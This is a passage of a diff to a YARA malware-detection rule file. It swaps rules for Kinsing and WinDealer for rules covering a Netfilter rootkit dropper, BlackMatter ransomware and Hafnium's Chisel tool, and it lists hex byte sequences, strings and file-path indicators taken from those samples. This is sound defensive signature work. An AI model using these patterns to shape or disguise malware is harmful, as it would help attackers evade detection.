+		$seq4 = { 8b 84 24 80 00 00 00 48 8d 54 24 38 48 8b 4c 24 30 44 8b ce 89 44 24 28 45 33 c0 48 89 7c 24 20 ff 15 66 2e 00 00 48 8b 4c 24 30 8b d8 ff 15 49 2e 00 00 48 8b 4c 24 30 ff 15 26 2d 00 00 8b }
+		$s1 = "%sc=%s" fullword ascii
+		$s2 = { 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 }
+		$s3 = "NETIO.SYS" fullword ascii
 
 	condition:
-		filesize < 1KB and 4 of ( $ClassCode* ) and 3 of ( $Com* ) and 3 of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize > 20KB and ( 3 of ( $seq* ) or 2 of ( $s* ) )
 }
-rule ARKBIRD_SOLG_Loader_JAVA_Kinsing_Aug_2020_Variant_B_1 : FILE
+rule ARKBIRD_SOLG_MAL_Netfilter_Dropper_Jun_2021_1 : FILE
 {
 	meta:
-		description = "Detect Kinsing Variant B"
+		description = "Detect the dropper of Netfilter rootkit"
 		author = "Arkbird_SOLG"
-		id = "7e0f9826-806c-5801-aab5-d2a8dba4e206"
-		date = "2020-08-28"
-		modified = "2020-08-29"
-		reference = "https://twitter.com/JAMESWT_MHT/status/1299222198574632961"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-08-28/Loader_JAVA_Kinsing_Aug_2020_1.yar#L32-L52"
+		id = "5e67c99c-6b08-5190-9c8a-55086c20923e"
+		date = "2020-06-18"
+		modified = "2021-06-18"
+		reference = "https://twitter.com/struppigel/status/1405483373280235520"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-18/Netfilter/MAL_Netfilter_Dropper_Jun_2021_1.yara#L1-L20"
 		license_url = "N/A"
-		logic_hash = "5862d02b4e57024aa1c00b0a10ac9ee1a733890cf7d5b9ec7586f0506af113fc"
+		logic_hash = "66e96304e097a0f6cd99cf77b20f61b8a0bcceaf8685a336c039a80947a08f78"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "e1471e8f9c1aa1457f819c0565a3444c53d3ec5fadf9f52ae988fde8e2d3a960"
-		hash2 = "e70ea87d00567d33e20ed8649ef532eda966a8b5b1e83ea19728528d991eaaa0"
+		hash1 = "a5c873085f36f69f29bb8895eb199d42ce86b16da62c56680917149b97e6dac"
+		hash2 = "659e0d1b2405cadfa560fe648cbf6866720dd40bb6f4081d3dce2dffe20595d9"
+		hash3 = "d0a03a8905c4f695843bc4e9f2dd062b8fd7b0b00103236b5187ff3730750540"
+		tlp = "White"
+		adversary = "Chinese APT Group"
 
 	strings:
-		$ClassCode1 = { 4c 69 66 45 78 70 2e 6a 61 76 61 0c 00 3f 00 40 }
-		$ClassCode2 = "java/lang/StringBuilder" fullword ascii
-		$ClassCode3 = "java/net/URL" fullword ascii
-		$ClassCode4 = { 6a 61 76 61 2f 6c 61 6e 67 2f 50 72 6f 63 65 73 73 42 75 69 6c 64 65 72 01 00 02 2e 2f }
-		$Com1 = "chmod +x " fullword ascii
-		$Com2 = { 53 4b 4c 01 00 02 6c 66 }
-		$s1 = "kinsing" fullword ascii
-		$s2 = "getAbsolutePath" fullword ascii
+		$seq1 = { b8 ff 00 00 00 50 b8 00 00 00 00 50 8d 85 dd fe ff ff 50 e8 ?? 0d 00 00 83 c4 0c b8 00 00 00 00 88 85 dc fd ff ff b8 ff 00 00 00 50 b8 00 00 00 00 50 8d 85 dd fd ff ff 50 e8 ?? 0d 00 00 83 c4 0c b8 00 00 50 00 50 e8 ?? 0d 00 00 83 c4 04 89 85 d8 fd ff ff 8b 85 d8 fd ff ff 89 85 d4 fd ff ff b8 00 00 50 00 50 b8 00 00 00 00 50 8b 85 d8 fd ff ff 50 e8 ?? 0c 00 00 83 c4 0c 8b 45 0c 8b 8d d8 fd ff ff 89 08 b8 3c 00 00 00 50 b8 00 00 00 00 50 8d 85 98 fd ff ff 50 e8 ?? 0c 00 00 83 c4 0c b8 3c 00 00 00 89 85 98 fd ff ff 8d 85 98 fd ff ff 83 c0 10 8d 8d dc fe ff ff 89 08 8d 85 98 fd ff ff 83 c0 14 b9 00 01 00 00 89 08 8d 85 98 fd ff ff 83 c0 2c 8d 8d dc fd ff ff 89 08 8d 85 98 fd ff ff 83 c0 30 b9 00 01 00 00 89 08 b8 0a 31 40 00 50 e8 ?? 0c 00 00 89 85 94 fd ff ff b8 16 31 40 00 50 8b 85 94 fd ff ff 50 e8 ?? 0c 00 00 89 45 fc b8 28 31 40 00 50 8b 85 94 fd ff ff 50 e8 ?? 0c 00 00 89 45 f8 b8 36 31 40 00 50 8b 85 94 fd ff ff 50 e8 [2] 00 00 89 45 f4 b8 47 31 40 00 50 8b 85 94 fd ff ff 50 e8 [2] 00 00 89 45 f0 b8 58 31 40 00 50 8b 85 94 fd ff ff 50 e8 ?? 0b 00 00 89 45 ec b8 69 31 40 00 50 8b 85 94 fd ff ff 50 e8 ?? 0b 00 00 89 45 e8 b8 7a 31 40 00 50 8b 85 94 fd ff ff 50 e8 ?? 0b 00 00 89 45 e4 b8 8e 31 40 00 50 8b 85 94 fd ff ff 50 e8 ?? 0b 00 00 89 45 e0 8b 45 08 50 e8 ?? 0b 00 00 83 c4 04 8d 8d 98 fd ff ff 51 b9 00 00 00 00 51 50 8b 45 08 50 8b 45 fc ff d0 85 }
+		$seq2 = { b8 00 00 00 00 89 85 90 fd ff ff b8 00 00 00 00 89 85 8c fd ff ff b8 00 00 00 00 89 85 88 fd ff ff b8 00 00 00 00 89 85 84 fd ff ff b8 04 00 00 00 89 85 80 fd ff ff b8 00 00 00 00 88 85 7f f5 ff ff b8 00 08 00 00 50 b8 00 00 00 00 50 8d 85 80 f5 ff ff 50 e8 ?? 0b 00 00 83 c4 0c b8 00 00 00 00 50 b8 00 00 00 00 50 b8 00 00 00 00 50 b8 00 00 00 00 50 b8 9d 31 40 00 50 8b 45 f8 ff d0 89 85 90 fd ff ff 8b 85 }
+		$s1 = "%s\\netfilter.sys" fullword ascii
+		$s2 = "SYSTEM\\CurrentControlSet\\Services\\netfilter" fullword ascii
+		$s3 = "\\\\.\\netfilter" fullword ascii
 
 	condition:
-		filesize < 1KB and 3 of ( $ClassCode* ) and 1 of ( $Com* ) and 2 of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize > 6KB and ( all of ( $seq* ) or 2 of ( $s* ) )
 }
-rule ARKBIRD_SOLG_MAL_Windealer_Oct_2021_1 : FILE
+rule ARKBIRD_SOLG_RAN_Blackmatter_Aug_2021_1 : FILE
 {
 	meta:
-		description = "Detect WinDealer implant"
+		description = "Detect BlackMatter ransomware"
 		author = "Arkbird_SOLG"
-		id = "7ffece8a-b56a-5893-a135-3001c0327f66"
-		date = "2021-10-30"
-		modified = "2021-10-31"
-		reference = "https://blogs.jpcert.or.jp/en/2021/10/windealer.html"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-10-30/WinDealer/MAL_WinDealer_Oct_2021_1.yara#L1-L19"
+		id = "eb308cde-af92-5b34-b256-88009f90810f"
+		date = "2021-08-02"
+		modified = "2021-08-02"
+		reference = "https://twitter.com/abuse_ch/status/1421834305416933376"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-01/Blackmatter/RAN_BlackMatter_Aug_2021_1.yara#L1-L23"
 		license_url = "N/A"
-		logic_hash = "b6211274a0ffa55723d3c34763540278197507b4bd4b853249e16501a3aa5acb"
-		score = 75
+		logic_hash = "ff158ce977eb10f36c9e8a032dd3880fcd5ecc09e9cc07cd27b98bbce5661d75"
+		score = 50
 		quality = 71
 		tags = "FILE"
-		hash1 = "1e9fc7f32bd5522dd0222932eb9f1d8bd0a2e132c7b46cfcc622ad97831e6128"
-		hash2 = "b9f526eea625eec1ddab25a0fc9bd847f37c9189750499c446471b7a52204d5a"
+		hash1 = "22d7d67c3af10b1a37f277ebabe2d1eb4fd25afbd6437d4377400e148bcc08d6"
+		hash2 = "7f6dd0ca03f04b64024e86a72a6d7cfab6abccc2173b85896fc4b431990a5984"
+		level = "Experimental"
 		tlp = "white"
-		adversary = "LuoYu"
+		adversary = "-"
 
 	strings:
-		$s1 = { 8b ec 81 ec 64 03 00 00 53 56 33 db 6a 64 8d 45 9c 53 50 e8 [2] 00 00 be 00 01 00 00 8d 85 9c fc ff ff 56 53 50 e8 [2] 00 00 56 8d 85 9c fd ff ff 53 50 e8 [2] 00 00 56 8d 85 9c fe ff ff 53 50 e8 [2] 00 00 83 c4 30 8d 45 9c 6a 64 50 ff 15 [2] 41 00 8d 85 9c fe ff ff 50 8d 85 9c fd ff ff 50 8d 85 9c fc ff ff 50 ff 75 9c e8 [2] ff ff 83 c4 10 38 9d 9c fe ff ff 5e 5b 75 20 8d 85 9c fe ff ff 50 8d 85 9c fd ff ff 50 8d 85 9c fc ff ff 50 ff 75 9c e8 [2] ff ff 83 c4 10 8d 85 9c fe ff ff 50 8d 85 9c fd ff ff 50 8d 85 9c fc ff ff 50 68 [2] 41 00 ff 75 08 ff 15 [2] 41 00 83 c4 14 6a }
-		$s2 = { 8b ec b8 40 1c 00 00 e8 [2] 00 00 56 57 33 ff 68 [2] 41 00 89 7d f8 ff 15 [2] 41 00 8b f0 6a 32 8d 45 c0 57 50 e8 [2] 00 00 83 c4 10 3b f7 74 1c 6a 5c 56 ff 15 [2] 41 00 59 3b c7 59 74 0d 40 50 8d 45 c0 50 e8 [2] 00 00 59 59 be 00 04 00 00 8d 85 c0 f7 ff ff 56 57 50 89 75 fc e8 [2] 00 00 8d 45 fc 50 8d 85 c0 f7 ff ff 50 e8 fb fd ff ff 83 c4 14 39 7d fc 75 24 56 8d 85 c0 f7 ff ff 57 50 89 75 fc e8 [2] 00 00 8d 45 fc 50 8d 85 c0 f7 ff ff 50 e8 ?? fc ff ff 83 c4 14 56 8d 85 c0 fb ff ff 57 50 e8 [2] 00 00 8d 85 c0 fb ff ff 50 e8 [2] 00 00 8d 85 c0 fb ff ff 50 e8 [2] 00 00 83 c4 14 83 7d fc 0a 7e 3e 83 f8 0a 7e 6d 8d 45 c0 50 8d 85 c0 fb ff ff 50 8d 85 c0 f7 ff ff 50 8d 85 c0 e3 ff ff 68 [2] 41 00 50 ff 15 [2] 41 00 50 8d 85 c0 e3 ff ff 50 e8 4d fd ff ff 83 c4 1c 89 45 f8 eb 5c 83 f8 0a 7e 2f 8d 45 c0 50 8d 85 c0 fb ff ff 50 8d 85 c0 e3 ff ff 68 [2] 41 00 50 ff 15 [2] 41 00 50 8d 85 c0 e3 ff ff 50 e8 16 fd ff ff 83 c4 18 eb c7 6a 43 8d 45 f4 68 [2] 41 00 50 ff 15 [2] 41 00 83 c4 0c 8d 45 f8 57 57 57 57 50 57 8d 45 f4 57 50 ff 15 [2] 41 00 8b 45 f8 }
-		$s3 = { 53 59 53 54 45 4d 5c 43 75 72 72 65 6e 74 43 6f 6e 74 72 6f 6c 53 65 74 5c 43 6f 6e 74 72 6f 6c 5c 4e 65 74 77 6f 72 6b 5c 7b 34 44 33 36 45 39 37 32 2d 45 33 32 35 2d 31 31 43 45 2d 42 46 43 31 2d 30 38 30 30 32 42 45 31 30 33 31 38 7d 5c 25 73 5c 43 6f 6e 6e 65 63 74 69 6f 6e }
-		$s4 = { 6d 61 63 3a 20 25 30 32 58 3a 25 30 32 58 3a 25 30 32 58 3a 25 30 32 58 3a 25 30 32 58 3a 25 30 32 58 }
-		$s5 = { 8b d8 59 85 db 59 74 57 56 e8 [2] 00 00 03 d8 53 ff 15 [2] 41 00 6a 00 50 e8 [2] ff ff 6a 64 8d 45 9c 6a 00 50 e8 [2] 00 00 83 c4 1c 8d 45 9c 68 [2] 41 00 68 [2] 41 00 50 ff 15 [2] 41 00 66 8b 8f d2 07 00 00 51 8a 8f d0 07 00 00 51 50 8d 45 9c 50 e8 ?? f1 ff ff 83 c4 1c 5f 5e 33 c0 5b c9 c3 55 }
+		$s1 = { 55 8b ec 81 ec ac 02 00 00 53 51 52 56 57 c7 45 fc 00 00 00 00 c7 45 f4 00 00 00 00 c7 45 f0 00 00 00 00 c7 45 ec 00 00 00 00 6a 00 ff 15 00 15 41 00 85 c0 0f 85 3e 04 00 00 8d 45 d4 50 6a 00 6a 00 6a 00 6a 00 6a 00 ff 15 84 15 41 00 85 c0 0f 85 1c 04 00 00 8d 85 7c ff ff ff c7 00 b1 5f 5a 22 c7 40 04 c8 5f 75 22 c7 40 08 b1 5f 06 22 b9 03 00 00 00 81 30 ed 5f 06 22 83 c0 04 49 75 f4 8b 7d 08 8b 4d d4 8d 45 f8 50 6a 00 6a 00 6a 00 6a 00 6a 02 ff 71 1c ff 15 88 15 41 00 85 c0 75 6d 8d 45 dc 50 6a 00 6a 00 ff 75 f8 ff 15 8c 15 41 00 85 }
+		$s2 = { 8d 45 88 c7 00 a1 5f 42 22 c7 40 04 ac 5f 56 22 c7 40 08 d7 5f 29 22 c7 40 0c c2 5f 45 22 c7 40 10 a3 5f 3b 22 c7 40 14 ae 5f 69 22 c7 40 18 80 5f 76 22 c7 40 1c 98 5f 72 22 c7 40 20 88 5f 74 22 c7 40 24 9e 5f 2a 22 c7 40 28 ed 5f 06 22 b9 0b 00 00 00 81 30 ed 5f 06 22 83 c0 04 49 75 f4 8d 45 88 50 8d 85 54 fd ff ff 50 ff 15 dc 12 41 00 83 c4 08 ff 75 cc 8d 85 54 fd ff ff 50 ff 15 d8 12 41 00 83 c4 08 8d 45 ec 50 8d 85 5c ff ff ff 50 6a 01 6a 00 6a 00 8d 85 54 fd ff ff 50 ff 15 98 15 41 00 }
+		$s3 = { 8d 45 b4 c7 00 21 0a 83 e9 c7 40 04 c5 ce d7 33 c7 40 08 40 c4 06 e2 c7 40 0c a2 87 fb dd b9 04 00 00 00 81 30 ed 5f 06 22 83 c0 04 49 75 f4 8d 45 a4 c7 00 6a f9 14 fe c7 40 04 92 2c c9 33 c7 40 08 65 12 06 88 c7 40 0c ed 14 28 06 b9 04 00 00 00 81 30 ed 5f 06 22 83 c0 04 49 75 f4 8d 45 94 c7 00 75 39 4d 45 c7 40 04 7f b1 d6 33 c7 40 08 40 2e 06 e2 c7 40 0c a2 87 fb dd b9 04 00 00 00 81 30 ed 5f 06 22 83 c0 04 49 75 f4 8d 45 84 c7 00 99 f9 aa 66 c7 40 04 11 b7 d6 33 c7 40 08 4d 23 06 e2 c7 40 0c a2 e9 8e 02 b9 04 00 00 00 81 30 ed 5f 06 22 83 c0 04 49 75 f4 8d 85 b8 fe ff ff c7 00 b2 5f 59 22 c7 40 04 bd 5f 74 22 c7 40 08 82 5f 70 22 c7 40 0c 84 5f 62 22 c7 40 10 88 5f 74 22 c7 40 14 ac 5f 74 22 c7 40 18 8e 5f 6e 22 c7 40 1c 84 5f 72 22 c7 40 20 88 5f 65 22 c7 40 24 99 5f 73 22 c7 40 28 9f 5f 63 22 c7 40 2c ed 5f 06 22 b9 0c 00 00 00 81 30 ed 5f 06 22 83 c0 04 49 75 f4 8d 85 6c ff ff ff c7 00 bf 5f 49 22 c7 40 04 a2 5f 52 22 c7 40 08 b1 5f 45 22 c7 40 0c a4 5f 4b 22 c7 40 10 bb 5f 34 22 c7 40 14 ed 5f 06 22 b9 06 00 00 }
+		$s4 = { 8d bd fc fe ff ff 32 c0 aa b9 2a 00 00 00 b0 ff f3 aa b0 3e aa b9 03 00 00 00 b0 ff f3 aa b0 3f aa b9 0a 00 00 00 b0 34 aa fe c0 e2 fb b9 03 00 00 00 b0 ff f3 aa 32 c0 aa b9 03 00 00 00 b0 ff f3 aa }
+		$s5 = { 35 35 35 4f 35 58 35 22 36 35 36 3f 36 2c 37 3f 37 60 37 76 37 }
+		$s6 = { 3d 2b 3d 47 3d 4d 3d 60 3d 67 3d 6d 3d }
+		$s7 = { 8b 0e 0f b6 d1 0f b6 dd 57 8d bd fc fe ff ff 8a 04 3a 8a 24 3b c1 e9 10 83 c6 04 0f b6 d1 0f b6 cd 8a 1c 3a 8a 3c 39 5f 8a d4 8a f3 c0 e0 02 c0 eb 02 c0 e6 06 c0 e4 04 c0 ea 04 0a fe 0a c2 0a e3 88 07 88 7f 02 88 67 01 ff 4d fc }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize > 80KB and 4 of ( $s* )
+		uint16( 0 ) == 0x5A4D and filesize > 25KB and 5 of ( $s* )
 }
-rule ARKBIRD_SOLG_MAL_Windealer_Oct_2021_2 : FILE
+rule ARKBIRD_SOLG_APT_Chisel_Hafnium_Feb_2021_1 : FILE
 {
 	meta:
-		description = "Detect modules from WinDealer implant"
+		description = "Rule for detecting Chisel kit tool used by Hafnium"
 		author = "Arkbird_SOLG"
-		id = "3cca1fa1-2651-5a93-bef1-d32a7b5be4c9"
-		date = "2021-10-30"
-		modified = "2021-10-31"
-		reference = "https://blogs.jpcert.or.jp/en/2021/10/windealer.html"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-10-30/WinDealer/MAL_WinDealer_Oct_2021_2.yara#L1-L19"
+		id = "cd6be3b4-71fd-5e17-8835-a331a24fc5d6"
+		date = "2021-02-23"
+		modified = "2021-04-25"
+		reference = "Internal Research"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-02-23/Hafinum/APT_Chisel_Hafnium_Feb_2021_1.yara#L1-L28"
 		license_url = "N/A"
-		logic_hash = "c2fb5697dcdb34e0fb3e2dbd2df05748eddc2796c253e90503372eb73c475fab"
+		hash = "4afa5fde76f1f3030cf7dbd12e37b717e1f902ac95c8bdf54a2e58a64faade04"
+		logic_hash = "8e56234ce59197a8df51b21b89d3a901785dbb0211ab576cb3d194de34b611de"
 		score = 75
-		quality = 75
+		quality = 57
 		tags = "FILE"
-		hash1 = "0c365d9730a10f1a3680d24214682f79f88aa2a2a602d3d80ef4c1712210ab07"
-		hash2 = "2eef273af0c768b514db6159d7772054d27a6fa8bc3d862df74de75741dbfb9c"
+		adversary = "Hafnium"
 		tlp = "white"
-		adversary = "LuoYu"
 
 	strings:
-		$s1 = { 81 ec f0 03 00 00 53 55 8b d9 56 8d 44 24 0c 57 8d 4c 24 18 50 51 c7 44 24 18 f4 01 00 00 ff 15 0c [2] 10 85 c0 0f 85 ?? 01 00 00 68 [3] 10  }
-		$s2 = { 81 ec 24 03 00 00 53 56 8d 44 24 18 57 50 68 03 01 00 00 6a 00 68 [2] 03 10 68 01 00 00 80 c7 44 24 20 00 00 00 00 ff 15 10 [2] 10 85 c0 0f 85 ?? 01 00 00 8d 4c 24 0c 8d 54 24 20 51 52 8b 1d 00 [2] 10 50 68 3f 01 0f 00 50 50 50 8b 44 24 38 68 [2] 03 10 50 ff d3 85 c0 0f 85 ?? 01 00 00 8d 4c 24 0c 8d 54 24 10 51 52 50 68 3f 01 0f 00 50 50 50 8b 44 24 3c 68 [2] 03 10 50 ff d3 85 c0 0f 85 ?? 01 00 00 bf [2] 03 10 83 c9 ff f2 ae f7 d1 2b f9 8d ?? 24 }
-		$s3 = "%s\\%s\\V5_History.dat" wide
-		$s4 = { 8b 8c 24 2c 02 00 00 8b 94 24 28 02 00 00 55 57 51 52 8d 44 24 24 53 50 89 74 24 2c e8 05 fb ff ff b9 41 00 00 00 33 c0 8d bc 24 34 01 00 00 83 c4 18 f3 ab 8d 8c 24 1c 01 00 00 51 68 04 01 00 00 ff 15 [2] 03 10 b9 41 00 00 00 33 c0 8d 7c 24 18 50 f3 ab [3] 01 }
-		$s5 = { 56 6a 10 e8 [3] 00 8b f0 85 f6 74 3a 8b 4c 24 0c 8d 46 04 85 c9 c7 06 [3] 10 c7 00 00 00 00 00 50 74 11 8b 44 24 0c 50 e8 [3] 00 89 46 08 8b c6 5e c3 8b 4c 24 0c 51 e8 [3] 00 89 46 08 8b c6 5e c3 33 }
+		$str1 = { 48 61 6e 64 73 68 61 6b 69 6e 67 20 77 69 74 68 20 25 73 2e 2e 2e }
+		$str2 = { 4c 65 74 73 45 6e 63 72 79 70 74 20 63 61 63 68 65 20 64 69 72 65 63 74 6f 72 79 20 25 73 }
+		$str3 = { 65 6e 63 6f 64 65 20 65 72 72 6f 72 3a 20 25 77 }
+		$str4 = { 28 65 72 72 6f 72 20 25 73 29 }
+		$str5 = { 45 72 72 6f 72 20 6c 6f 61 64 69 6e 67 20 63 6c 69 65 6e 74 20 63 65 72 74 20 61 6e 64 20 6b 65 79 20 70 61 69 72 3a 20 25 76 }
+		$str6 = { 4c 69 73 74 65 6e 69 6e 67 20 6f 6e 20 25 73 3a 2f 2f 25 73 3a 25 73 25 73 }
+		$str7 = { 46 61 69 6c 65 64 20 74 6f 20 64 65 63 6f 64 65 20 50 45 4d 3a 20 25 73}
+		$str8 = { 43 6c 6f 73 65 64 20 63 6f 6e 6e 65 63 74 69 6f 6e 20 28 25 73 29 }
+		$str9 = { 70 72 6f 78 79 23 25 73 }
+		$seq1 = { 48 89 05 5a 96 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 3c 67 10 00 48 89 44 24 30 48 c7 44 24 38 01 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 05 fd ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d d7 b4 40 00 48 89 15 d8 b4 40 00 83 3d 41 0d 45 00 00 90 0f 85 b5 0b 00 00 48 89 05 b3 b4 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 50 eb 18 00 48 89 44 24 30 48 c7 44 24 38 01 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 96 fc ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d e8 b2 40 00 48 89 15 e9 b2 40 00 83 3d d2 0c 45 00 00 0f 85 36 0b 00 00 48 89 05 c5 b2 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 e3 ea 18 00 48 89 44 24 30 48 c7 44 24 38 01 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 28 fc ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d da b2 40 00 48 89 15 db b2 40 00 83 3d 64 0c 45 00 00 0f 1f 40 00 0f 85 b0 0a 00 00 48 89 05 b3 b2 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 ee 65 10 00 48 89 44 24 30 48 c7 44 24 38 01 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 b6 fb ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d e8 b2 40 00 48 89 15 e9 b2 40 00 83 3d f2 0b 45 00 00 0f 85 31 0a 00 00 48 89 05 c5 b2 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 04 ea 18 00 48 89 44 24 30 48 c7 44 24 38 01 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 48 fb ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d 5a b3 40 00 48 89 15 5b b3 40 00 83 3d 84 0b 45 00 00 0f 1f 40 00 0f 85 aa 09 00 00 48 89 05 33 b3 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 0f 65 10 00 48 89 44 24 30 48 c7 44 24 38 01 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 d6 fa ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d c8 b0 40 00 48 89 15 c9 b0 40 00 83 3d 12 0b 45 00 00 0f 85 2b 09 00 00 48 89 05 a5 b0 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 25 e9 18 00 48 89 44 24 30 48 c7 44 24 38 01 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 68 fa ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d 5a b2 40 00 48 89 15 5b b2 40 00 83 3d a4 0a 45 00 00 0f 1f 40 00 0f 85 a8 08 00 00 48 89 05 33 b2 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 b4 e8 18 00 48 89 44 24 30 48 c7 44 24 38 01 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 f6 f9 ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d 08 b1 40 00 48 89 15 09 b1 40 00 83 3d 32 0a 45 00 00 0f 85 29 08 00 00 48 89 05 e5 b0 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 21 64 10 00 48 89 44 24 30 48 c7 44 24 38 02 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 88 f9 ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d 5a af 40 00 48 89 15 5b af 40 00 83 3d c4 09 45 00 00 0f 1f 40 00 0f 85 a6 07 00 00 48 89 05 33 af 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 b1 63 10 00 48 89 44 24 30 48 c7 44 24 38 02 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 16 f9 ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d c8 b0 40 00 48 89 15 c9 b0 40 00 83 3d 52 09 45 00 00 0f 85 27 07 00 00 48 89 05 a5 b0 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 45 63 10 00 48 89 44 24 30 48 c7 44 24 38 02 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 a8 f8 ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d 9a af 40 00 48 89 15 9b af 40 00 83 3d e4 08 45 00 00 0f 1f 40 00 0f 85 a4 06 00 00 48 89 05 73 af 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 d5 62 10 00 48 89 44 24 30 48 c7 44 24 38 02 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 36 f8 ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d c8 b0 40 00 48 89 15 c9 b0 40 00 83 3d 72 08 45 00 00 0f 85 22 06 00 00 48 89 05 a5 b0 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 69 62 10 00 48 89 44 24 30 48 c7 44 24 38 02 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 c8 f7 ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d fa ad 40 00 48 89 15 fb ad 40 00 83 3d 04 08 45 00 00 0f 1f 40 00 0f 85 9f 05 00 00 48 89 05 d3 ad 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 f9 61 10 00 48 89 44 24 30 48 c7 44 24 38 02 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 56 f7 ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d c8 ae 40 00 48 89 15 c9 ae 40 00 83 3d 92 07 45 00 00 0f 85 1c 05 00 00 48 89 05 a5 ae 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 8d 61 10 00 48 89 44 24 30 48 c7 44 24 38 02 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 e8 f6 ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d 7a ad 40 00 48 89 15 7b ad 40 00 83 3d 24 07 45 00 00 0f 1f 40 00 0f 85 99 04 00 00 48 89 05 53 ad 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 1d 61 10 00 48 89 44 24 30 48 c7 44 24 38 02 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 76 f6 ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d c8 ae 40 00 48 89 15 c9 ae 40 00 83 3d b2 06 45 00 00 0f 85 1a 04 00 00 48 89 05 a5 ae 40 00 0f 57 c0 0f 11 44 24 30 48 8d 05 b1 60 10 00 48 89 44 24 30 48 c7 44 24 38 02 00 00 00 48 8d 44 24 30 48 89 04 24 48 c7 44 24 08 01 00 00 00 48 c7 44 24 10 01 00 00 00 e8 08 f6 ff ff 48 8b 44 24 18 48 8b 4c 24 20 48 8b 54 24 28 48 89 0d ba ab 40 00 48 89 15 bb ab 40 00 83 3d 44 06 45 00 00 0f 1f 40 00 0f 85 97 03 00 00 48 89 05 93 ab 40 00 